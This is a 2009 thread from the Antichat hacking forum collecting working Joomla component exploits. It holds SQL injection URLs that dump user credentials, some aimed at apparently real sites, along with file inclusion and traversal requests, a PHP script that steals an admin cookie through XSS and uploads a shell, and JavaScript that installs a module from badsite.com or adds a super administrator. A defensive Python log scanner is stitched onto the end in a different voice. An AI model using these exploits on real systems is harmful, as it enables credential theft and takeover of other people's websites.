Antichat is available again.
The Antichat forum (Античат) is back and open to users again.
Security, programming, technology and much more are discussed here.
The community is gathering together again.
New address: forum.antichat.xyz

Joomla Component com_bookjoomlas

07.04.2009, 10:17
Forum member
Registered: 02.09.2007
Posts: 292
Time on forum: 3659973
Reputation: 466

Joomla Component com_bookjoomlas
Code:
[+] Bugs
- [A] SQL Injection
[-] Security risk: low
[-] File affected: sub_commententry.php
This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulated to write
files on the system.
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
*************************************************
[+] Fix
No fix.
*************************************************
# milw0rm.com [2009-04-06]

13.04.2009, 15:33
Forum member
Registered: 14.01.2009
Posts: 257
Time on forum: 1936181
Reputation: 688

Code:
#############################################################################
# #
# Joomla Component MailTo SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MailTo (com_mailto)"
[~] Date: "April 2006"
########################################
[~] Exploit /index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
[~] Example /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] LiveDemo: http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
Code:
#############################################################################
# #
# Joomla Component MaianMusic SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "MaianMusic (com_maianmusic)"
[~] Version: "1.2.1"
[~] Date: "09-26-2008"
[~] Author: "Arelowo Alao & David Bennett"
[~] Author E-mail: "Alao@aretimes.com"
[~] Author URL: "www.aretimes.com"
########################################
[~] Exploit: /index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70
[~] Example: /index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70
########################################
[~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
----------------------------------------------------------------+
Code:
#############################################################################
# #
# Joomla Component Cmimarketplace Directory Traversal Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de
[~] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
########################################
[~] ScriptName: "Joomla"
[~] Component: "Cmimarketplace (com_cmimarketplace)"
[~] Date: "August 2008"
[~] Author: "Magnetic Merchandising Inc."
[~] E-mail: "client@ijobid.com"
[~] Author URL: "www.ijobid.com"
########################################
[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1
[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1
########################################
[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de
########################################
© milw0rm.com [2009-04-08]

16.04.2009, 19:33
Learner
Registered: 29.03.2009
Posts: 87
Time on forum: 2185909
Reputation: 308

Today I had to deal with Joomla 1.5, started looking for exploits, and found this on the official forum: http://forum.joomla.org/viewtopic.php?f=300&t=371705
So I wrote a small exploit:
Code:
<?php
// Deleting arbitrary images in the Joomla catalogue
// by [underwater]
$WEB_VULNERABLE = 'http://www.site.com/';
// If the directory listing cannot be read, request removal of the index.html that hides it and wait
if(!$archive = obt_archive($WEB_VULNERABLE.'images/')){
echo '<iframe src="'.$WEB_VULNERABLE.'administrator/index.php?option=com_media&task=file.delete&tmpl=component&folder=&rm[]=index.html" width="1" height="1" frameborder="0"></iframe>';
ob_get_contents();
sleep(5);
}
if($archive = obt_archive($WEB_VULNERABLE.'images/')){
foreach($archive as $valor){
// an entry ending in '/' is a folder, anything else is a file
if(substr($valor, -1) == '/'){ $tipo = 'folder'; }else{ $tipo = 'file'; }
echo '<iframe src="'.
$WEB_VULNERABLE.'administrator/index.php?option=com_media&task='.$tipo
.'.delete&tmpl=component&folder=&rm[]='.urlencode($valor)
.'" width="1" height="1" frameborder="0"></iframe>';
}
}
// Collect the entries of a directory listing page (the href of every link after the first)
function obt_archive($url){
$retorn = array();
$buffer = explode(']"> <a href="', file_get_contents($url));
foreach($buffer as $item => $valor){
if($item != '0'){
$temp = explode('"', $valor);
$retorn[] = $temp[0];
}
}
return $retorn;
}
?>
Then I found an XSS
Code:
http://127.0.0.1/joomla/index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%2520%2578%253d%2578%253e%2561%256c%2565%2572%2574%2528%2530%2530%2530%2530%2530%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e&ordering=newest&searchphrase=all&option=com_search
I don't know whether this XSS had been found before me or not, I haven't seen it anywhere; the tastiest part is that you can upload a shell through it, here is the exploit:
Code:
<?php
error_reporting(0);
$EXPL['SITE_VULNERABLE'] = 'http://127.0.0.1/joomla/';
$EXPL['URL_COM_SHELL'] = 'http://127.0.01/shell'; // Path to the shell
$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';
if($_GET['act'] == 'js'){
die('
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function base64_encode(input){
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do{
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if(isNaN(chr2)){
enc3 = enc4 = 64;
}else if(isNaN(chr3)){
enc4 = 64;
}
output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
}while(i < input.length);
return output;
}
window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');
}elseif($_GET['act'] == 'galletas'){
if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>No cookies(</strong>');
$buffer = http_get($EXPL['SITE_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
// Pull the 32-character form token out of the hidden input on the installer page
$buscar = explode('hidden" name="', $buffer);
foreach($buscar as $encont){
$encont = explode('"', $encont);
$encont = $encont[0];
if(strlen($encont) == 32){
$hash = $encont;
break;
}
}
$buffer = http_post(
$EXPL['SITE_VULNERABLE'].'/administrator/index.php', $cookies,
$hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
);
if(eregi('200 OK', http_get($EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php', ''))){
// Operation completed successfully! shell at /modules/mod_artimesk/mod_artimesk.php
header('UnderWhat?!');
$explot = true;
}else{
$explot = false;
}
if($archiv_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
if($explot){
fwrite($archiv_handle, 'Shell uploaded successfully. URL: '.$EXPL['SITE_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
header('location: https://forum.antichat.ru');
}else{
fwrite($archiv_handle,
$EXPL['SITE_VULNERABLE'].' The exploit cannot be used: incompatible version, or you do not have admin rights.'."\x0D\x0A");
}
fclose($archiv_handle);
}
exit($explot);
}
// Execution of arbitrary JavaScript
$pedir = $EXPL['SITE_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
header('location: '.$EXPL['SITE_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
die('hola :-s');
}
function http_post($url, $cookies, $postdata){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}
function http_get($url, $cookies){
$timeout = 100;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);
$conten = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
if($conten)
return $conten;
else
return $error;
}
?>
Last edited by [underwater]; 16.04.2009 at 19:35.

Joomla Component rsmonials Remote Cross Site Scripting Exploit

22.04.2009, 23:44
Moderator - Level 7
Registered: 28.04.2007
Posts: 547
Time on forum: 5516499
Reputation: 3702

Joomla Component rsmonials Remote Cross Site Scripting Exploit
Code:
/*
RSMonials XSS Exploit
http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component
Google Dork: allinurl:option=com_rsmonials
Anything entered into the form gets rendered as HTML, so you can add tags
as long as they don't include quotes (magic quotes eats them, if it's on).
This component ships with settings that prevent posting by default, but
the administrator page for the testimonials renders your script in its entirety.
Proof of Concept 1: Remote file upload
Visit http://target.com/index.php?option=com_rsmonials and post a comment.
At the end of your glowing comment about how awesome the site is, attach this:
<script src=http://badsite.com/evil.js></script>
Now, when your admin goes to the com_rsmonials "Testimonials" page, your
script will execute. In this example, a hidden iframe loads up the install
page and installs a 'custom' module.
*/
var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) )
{
iframe.src = 'index.php?option=com_installer';
iframe.setStyle( 'display', 'none' );
document.body.appendChild( iframe );
iframe.addEvent( 'load', exploit );
}
function exploit( e )
{
if( exploited != true )
{
var doc = e.target.contentDocument; if( !doc ) return;
var inp = doc.getElementById( 'install_url' );
inp.value = 'http://badsite.com/exploit.zip';
var b = inp.parentNode.getElementsByTagName( 'input' )[1];
b.onclick();
exploited = true;
}
}
/*
Proof of Concept 2: New Super Administrator
Here's a drop-in replacement for the 'exploit' function above:
function exploit( e )
{
if( exploited != true )
{
var newForm = false;
var doc = e.target.contentDocument; if( !doc ) return;
var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
var i = 0;
for( ; i<nb.length; i++ )
{
if( nb[i].parentNode.id == 'toolbar-new' )
{
nb[i].onclick();
}
else if( nb[i].parentNode.id == 'toolbar-save' )
{
doc.getElementById( 'name' ).value = 'hacked';
doc.getElementById( 'username' ).value = 'hacked';
doc.getElementById( 'email' ).value = 'your@freemail.com';
doc.getElementById( 'password' ).value = 'password';
doc.getElementById( 'password2' ).value = 'password';
var g = doc.getElementById( 'gid' );
g.selectedIndex = g.options.length - 1;
nb[i].onclick();
exploited = true;
}
}
}
}
If the admin is a Super Admin, then you could be too... just remember to watch
your freemail account for Joomla's account notification!
*/
/* jdc 2009 */
# milw0rm.com [2009-04-22]

24.04.2009, 04:46
Members of Antichat - Level 5
Registered: 09.10.2006
Posts: 1,698
Time on forum: 9098076
Reputation: 4303

com_dictionary
/components/com_dictionary/dictionary.php
PHP code:
if($wordid)//a word is selected, need to show its description
{
echo "<h3>Описание</h3>";
$database->setQuery("SELECT wordid,word,worddescription FROM #__dictionary where wordid=".$wordid);
$result = $database->query();
$row = mysql_fetch_object($result);
index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users

27.04.2009, 23:52
Learner
Registered: 29.03.2009
Posts: 87
Time on forum: 2185909
Reputation: 308

I read about the following vulnerability on some Spanish blog:
http://127.0.0.1/joomla/index.php?option=com_user&task=register
HTML code can be inserted into the username; there is a small filter, which is bypassed with quotes ;P
For example, something like:
Code:
number" onclick="document.location='http://www.site.com/?cookies.php?cookies='+document.cookie" x="
The rest is a matter of technique: a one-pixel picture does the redirect to the evil script.
This marvel lives here: /administrator/components/com_users/views/user/tmpl/form.php
The funny thing is that the Joomla coders screwed up the exact same way in 10 more files)

28.04.2009, 18:04
Learner
Registered: 29.03.2009
Posts: 87
Time on forum: 2185909
Reputation: 308

Clickheat [for Joomla]
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
Vuln file: install.clickheat.php
Vuln Code:
Code:
require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00
Vuln file: _main.php
Vuln Code:
Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: main.php
Vuln Code:
Code:
require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: Cache.php
Vuln Code:
Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: Clickheat_Heatmap.php
Vuln Code:
Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: GlobalVariables.php
Vuln Code:
Code:
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
Exploit:
Code:
http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Well, that's about it...)

18.05.2009, 17:38
Regular
Registered: 16.02.2008
Posts: 395
Time on forum: 3370466
Reputation: 96

Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities
ArtForms 2.1b7 remote file includes
From Turkey
iskorpitx (A world brand, it can never be imitated)
// swfmovie.php - swf output and config
/* output captcha image */
/* output captcha mp3 */
----------------------------------------------------------------------------------
Code:
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell
Code:
[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell
Code:
[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org
# milw0rm.com [2009-05-15]
Last edited by swt1; 18.05.2009 at 17:44.

02.06.2009, 12:25
Regular
Registered: 16.02.2008
Posts: 395
Time on forum: 3370466
Reputation: 96

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection
==================================================================================
Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================
###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine
[+] Email : chipdebios[alt+64]gmail.com
###################################################
Code:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
Code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
Code:
http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>
# milw0rm.com [2009-06-01]

15.06.2009, 11:33
Regular
Registered: 16.02.2008
Posts: 395
Time on forum: 3370466
Reputation: 96

Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Joomla com_vehiclemanager 1.0 Remote File Include
Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: xorontr@gmail.com (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit:
-> ...
Code:
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, VoLkan
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2009-06-09]
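The request patterns quoted throughout this thread (UNION SELECT in an integer parameter, mosConfig_absolute_path and GLOBALS[...] overrides carrying ../ and %00, a /../ in viewit, and a double-encoded script tag in searchword) make a compact detection rule set. The script below is an added defensive example, not code from this thread or from any of the advisories; the access-log lines, the rule names and the helper functions are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qsl, unquote

# Constructed sample access-log lines modelled on the requests quoted in this thread (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - - [07/Apr/2009:10:17:00 +0000] "GET /index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1%20UNION%20ALL%20SELECT%201,2,CONCAT(username,0x3a,password)%20FROM%20jos_users HTTP/1.1" 200 5120
10.0.0.6 - - [28/Apr/2009:18:04:00 +0000] "GET /administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 200 1180
10.0.0.7 - - [13/Apr/2009:15:34:00 +0000] "GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1 HTTP/1.1" 200 2210
10.0.0.8 - - [16/Apr/2009:19:33:00 +0000] "GET /index.php?searchword=%253c%2553%2543%2572%2549%2570%2554%253e&option=com_search HTTP/1.1" 200 3000
10.0.0.9 - - [16/Apr/2009:19:40:00 +0000] "GET /index.php?option=com_content&view=article&id=12&Itemid=3 HTTP/1.1" 200 7400
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
UNION_RE = re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")
SCRIPT_RE = re.compile(r"<\s*script\b|\bon\w+\s*=", re.I)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (the searchword payload above is encoded twice)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(path):
    """Return a list of (finding, parameter) pairs for one request path (empty if clean)."""
    findings = []
    for name, raw in parse_qsl(urlparse(path).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already removed one encoding layer
        # Joomla 1.x register_globals-style override of the config path used in require_once
        if name == "mosConfig_absolute_path" or name.startswith("GLOBALS["):
            findings.append(("config_override_include", name))
        if UNION_RE.search(value):
            findings.append(("sql_union_injection", name))
        if TRAVERSAL_RE.search(value) or "\x00" in value:
            findings.append(("path_traversal", name))
        if SCRIPT_RE.search(value):
            findings.append(("script_injection", name))
    return findings


def scan_log(text):
    """Scan access-log text; return {request_path: findings} for flagged requests only."""
    flagged = {}
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match and (findings := classify_request(match.group(1))):
            flagged[match.group(1)] = findings
    return flagged


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG).items():
        print(path[:70], findings)
```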